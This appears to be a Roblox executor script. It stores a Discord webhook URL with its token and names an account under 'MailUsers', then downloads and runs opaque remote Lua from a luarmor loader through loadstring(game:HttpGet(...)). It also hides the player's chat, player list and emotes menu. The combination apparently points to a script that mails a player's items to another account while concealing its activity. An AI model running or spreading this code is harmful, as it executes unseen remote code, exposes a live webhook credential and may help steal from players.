game:GetService("ReplicatedStorage"):WaitForChild("Network"):WaitForChild("World1Teleport"):InvokeServer()
--task.wait(1)
repeat wait() until game:IsLoaded()
task.spawn(function()
getgenv().Config = {
    ["Webhook"] = "https://discord.com/api/webhooks/1315701198757564507/b9Ie9_fWw9urd9HRuJ3Fw0wKt5tKPBO3ciAD9obRQRpUw-V9yaURqCBAoFLajELa52E3",
    ["UserID"] = "11111111111111",
    ["MailUsers"] = {"herma9vz"},
}
loadstring(game:HttpGet("https://api.luarmor.net/files/v3/loaders/e43eeb29211cc04ff3dad8003ed8deaa.lua"))()
end)

task.spawn(function()
    task.wait(5)
local StarterGui = game:GetService('StarterGui')
StarterGui:SetCoreGuiEnabled(Enum.CoreGuiType.Chat, false)

game:GetService('StarterGui'):SetCoreGuiEnabled(Enum.CoreGuiType.PlayerList, false)

game.StarterGui:SetCoreGuiEnabled(Enum.CoreGuiType.EmotesMenu, false)
end)
